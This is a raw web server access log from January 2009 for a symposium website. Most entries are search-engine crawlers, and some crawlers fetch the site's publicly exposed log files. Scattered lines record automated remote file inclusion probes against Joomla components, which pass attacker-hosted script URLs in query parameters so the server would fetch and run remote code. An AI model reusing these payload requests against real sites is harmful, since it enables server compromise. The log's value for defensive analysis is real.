208.111.154.16 - - [20/Jan/2009:11:26:48 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.52 - - [20/Jan/2009:14:45:22 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; (R1 1.5); .NET CLR 1.0.3705)" 0 www.geil-symposium.com
72.30.142.164 - - [20/Jan/2009:17:27:15 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [20/Jan/2009:17:27:15 -0500] "GET /logs/error.log HTTP/1.0" 200 251003 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.47 - - [20/Jan/2009:20:51:34 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {107E3F8B-EF2E-8E15-1714-B1C139608A04}; acc=marketingsector; SV1)" 0 www.geil-symposium.com
203.209.252.68 - - [20/Jan/2009:22:40:48 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [20/Jan/2009:22:40:48 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
208.111.154.16 - - [21/Jan/2009:01:22:40 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.195.37.116 - - [21/Jan/2009:04:06:40 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.116 - - [21/Jan/2009:04:06:40 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.116 - - [21/Jan/2009:04:06:50 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.35 - - [21/Jan/2009:04:17:49 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; HbTools 4.8.2)" 0 www.geil-symposium.com
72.30.142.164 - - [21/Jan/2009:04:49:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [21/Jan/2009:04:49:15 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.115.111.242 - - [21/Jan/2009:07:12:19 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.geil-symposium.com
208.115.111.242 - - [21/Jan/2009:09:57:07 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.geil-symposium.com
208.115.111.242 - - [21/Jan/2009:09:57:46 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.geil-symposium.com
72.20.109.37 - - [21/Jan/2009:10:44:56 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [21/Jan/2009:10:44:57 -0500] "GET / HTTP/1.1" 200 326 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [21/Jan/2009:10:44:57 -0500] "GET / HTTP/1.1" 200 326 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [21/Jan/2009:10:44:57 -0500] "GET /logs HTTP/1.1" 301 343 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [21/Jan/2009:10:44:58 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 1 www.geil-symposium.com
66.235.124.38 - - [21/Jan/2009:11:01:57 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [21/Jan/2009:11:01:57 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
72.30.142.164 - - [21/Jan/2009:11:04:30 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [21/Jan/2009:11:04:30 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
114.111.36.26 - - [21/Jan/2009:11:29:55 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
114.111.36.26 - - [21/Jan/2009:11:30:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
208.111.154.248 - - [21/Jan/2009:12:11:26 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.18) Gecko/20081203 Firefox/2.0.0.18" 0 www.geil-symposium.com
208.111.154.248 - - [21/Jan/2009:12:11:26 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.18) Gecko/20081203 Firefox/2.0.0.18" 0 www.geil-symposium.com
208.111.154.248 - - [21/Jan/2009:12:11:26 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.18) Gecko/20081203 Firefox/2.0.0.18" 0 www.geil-symposium.com
208.111.154.248 - - [21/Jan/2009:12:11:26 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.18) Gecko/20081203 Firefox/2.0.0.18" 0 www.geil-symposium.com
208.111.154.15 - - [21/Jan/2009:14:06:12 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [21/Jan/2009:14:06:13 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [21/Jan/2009:15:00:25 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
219.85.63.226 - - [21/Jan/2009:15:32:53 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kadin.or.id/mail/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
219.85.63.226 - - [21/Jan/2009:15:32:53 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kadin.or.id/mail/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
91.143.130.1 - - [21/Jan/2009:15:34:45 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
91.143.130.1 - - [21/Jan/2009:15:34:45 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
91.143.130.1 - - [21/Jan/2009:15:34:45 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
66.235.124.38 - - [21/Jan/2009:22:51:28 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.111.154.15 - - [22/Jan/2009:01:30:09 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Jan/2009:01:30:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.20.109.37 - - [22/Jan/2009:01:55:47 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [22/Jan/2009:01:55:47 -0500] "GET / HTTP/1.1" 200 326 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [22/Jan/2009:01:55:47 -0500] "GET / HTTP/1.1" 200 326 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [22/Jan/2009:01:55:48 -0500] "GET /logs HTTP/1.1" 301 343 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
72.20.109.37 - - [22/Jan/2009:01:55:48 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "GurujiBot/1.0 (+http://www.guruji.com/en/WebmasterFAQ.html)" 0 www.geil-symposium.com
208.111.154.15 - - [22/Jan/2009:03:10:58 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [22/Jan/2009:03:10:58 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Jan/2009:08:12:57 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Jan/2009:08:12:57 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Jan/2009:08:12:59 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Jan/2009:17:20:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.32 - - [22/Jan/2009:18:40:26 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {F9EF74A6-B702-A14F-ECE8-9A6A0B4278B5}; YPC 3.2.0; MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH; MPLUS)" 0 www.geil-symposium.com
208.80.194.46 - - [22/Jan/2009:19:13:39 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.2.1.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)" 0 www.geil-symposium.com
163.191.228.254 - - [22/Jan/2009:22:21:20 -0500] "GET /images/Philip_H_Geil_logo.jpg HTTP/1.1" 404 - "http://www.leapfish.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)" 0 www.geil-symposium.com
211.202.2.220 - - [23/Jan/2009:02:04:35 -0500] "GET ///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
211.202.2.220 - - [23/Jan/2009:02:04:35 -0500] "GET /logs///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
211.202.2.220 - - [23/Jan/2009:02:04:36 -0500] "GET /logs/error.log%20%20///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
211.202.2.220 - - [23/Jan/2009:02:05:15 -0500] "GET /logs///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
211.202.2.220 - - [23/Jan/2009:02:05:15 -0500] "GET ///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
211.202.2.220 - - [23/Jan/2009:02:05:15 -0500] "GET /logs/error.log%20%20///vwar/backup/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
66.235.124.38 - - [23/Jan/2009:04:38:12 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [23/Jan/2009:04:38:12 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
58.61.164.40 - - [23/Jan/2009:06:44:24 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
83.133.125.202 - - [23/Jan/2009:09:07:33 -0500] "GET / HTTP/1.1" 200 326 "http://www.BigFinder.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)" 0 www.geil-symposium.com
83.133.125.202 - - [23/Jan/2009:09:07:34 -0500] "GET / HTTP/1.0" 200 314 "-" "-" 1 www.geil-symposium.com
83.133.125.202 - - [23/Jan/2009:09:07:34 -0500] "GET / HTTP/1.0" 200 314 "-" "-" 0 www.geil-symposium.com
66.249.71.87 - - [23/Jan/2009:12:03:13 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.86 - - [23/Jan/2009:12:03:13 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
69.73.185.100 - - [23/Jan/2009:12:27:19 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
69.73.185.100 - - [23/Jan/2009:12:27:19 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
81.19.179.10 - - [23/Jan/2009:12:42:37 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
81.19.179.10 - - [23/Jan/2009:12:42:37 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
67.205.112.106 - - [23/Jan/2009:12:43:23 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
67.205.112.106 - - [23/Jan/2009:12:43:23 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
222.122.38.77 - - [23/Jan/2009:12:50:15 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" 0 www.geil-symposium.com
222.122.38.77 - - [23/Jan/2009:12:50:15 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" 0 www.geil-symposium.com
69.57.154.36 - - [23/Jan/2009:13:08:57 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 www.geil-symposium.com
69.57.154.36 - - [23/Jan/2009:13:09:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 www.geil-symposium.com
70.86.236.106 - - [23/Jan/2009:13:14:43 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" 0 www.geil-symposium.com
70.86.236.106 - - [23/Jan/2009:13:14:48 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" 0 www.geil-symposium.com
200.54.154.10 - - [23/Jan/2009:13:15:28 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" 0 www.geil-symposium.com
200.54.154.10 - - [23/Jan/2009:13:15:28 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" 0 www.geil-symposium.com
72.30.142.164 - - [23/Jan/2009:14:06:08 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [23/Jan/2009:14:06:08 -0500] "GET /logs/access.log HTTP/1.0" 200 391683 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.15 - - [23/Jan/2009:16:17:26 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [23/Jan/2009:16:17:27 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [23/Jan/2009:16:49:05 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
80.83.90.50 - - [23/Jan/2009:17:29:11 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
80.83.90.50 - - [23/Jan/2009:17:29:11 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
80.83.90.50 - - [23/Jan/2009:17:29:12 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
219.94.174.158 - - [23/Jan/2009:17:35:52 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
219.94.174.158 - - [23/Jan/2009:17:35:52 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
219.94.174.158 - - [23/Jan/2009:17:35:53 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
89.96.52.71 - - [23/Jan/2009:18:03:50 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
89.96.52.71 - - [23/Jan/2009:18:03:51 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
89.96.52.71 - - [23/Jan/2009:18:03:52 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" 0 www.geil-symposium.com
97.66.79.173 - - [23/Jan/2009:18:19:00 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
97.66.79.173 - - [23/Jan/2009:18:19:02 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
97.66.79.173 - - [23/Jan/2009:18:19:02 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://myungsung.co.kr//easy_editor/tmp/ab.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
77.220.131.217 - - [23/Jan/2009:22:27:42 -0500] "GET / HTTP/1.1" 200 322 "http://otvetoff.ru/question/129984" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.9 (build 01863); .NET CLR 2.0.50727)" 0 www.geil-symposium.com
208.80.194.52 - - [23/Jan/2009:22:54:56 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 2.0.50215; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.111.154.16 - - [23/Jan/2009:23:37:31 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
193.47.80.36 - - [23/Jan/2009:23:54:14 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [23/Jan/2009:23:54:14 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
67.195.37.182 - - [23/Jan/2009:23:54:45 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.182 - - [23/Jan/2009:23:54:47 -0500] "GET /logs/access.log HTTP/1.0" 200 396553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 2 www.geil-symposium.com
67.205.7.217 - - [24/Jan/2009:09:27:29 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.geil-symposium.com
67.205.7.217 - - [24/Jan/2009:09:27:29 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.geil-symposium.com
67.205.7.217 - - [24/Jan/2009:09:27:29 -0500] "GET /logs/error.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" 0 www.geil-symposium.com
213.91.246.64 - - [24/Jan/2009:09:28:28 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
